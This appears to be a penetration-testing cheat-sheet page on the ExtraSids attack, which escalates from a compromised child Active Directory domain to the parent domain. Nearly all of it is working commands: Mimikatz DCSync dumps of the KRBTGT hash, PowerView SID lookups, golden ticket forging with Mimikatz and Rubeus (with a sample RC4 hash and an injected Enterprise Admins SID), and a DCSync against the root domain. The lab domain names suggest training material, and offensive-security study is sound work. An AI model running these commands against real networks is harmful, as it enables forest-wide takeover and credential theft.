extra-sids

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the SidHistory property is respected due to a lack of SID filtering protection.

Obtaining the KRBTGT account's NT hash using Mimikatz

.\mimikatz.exe "lsadump::dcsync /user:LOGISTICS\krbtgt" exit

Get domain SID [SID of the child domain] (powerview)

Get-domainSID

Obtaining a group SID of the root domain

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "<group Name>" | select distinguishedname,objectsid

Create a golden ticket attack (Mimikatz)

.\mimikatz.exe "Kerberos::golden /user:<username> /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:<child domain SID> /krbtgt:<krbtgt_hash> /ptt" exit

Klist

Create a golden ticket (Rubeus)

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:<child domain SID>  /sids:"Enterprise Admins" /user:hacker /ptt

Perform DCSync Attack

.\mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\<user_name> /domain:INLANEFREIGHT.LOCAL" exit

Previousdns-record Nextforce-change-password

Last updated 21 hours ago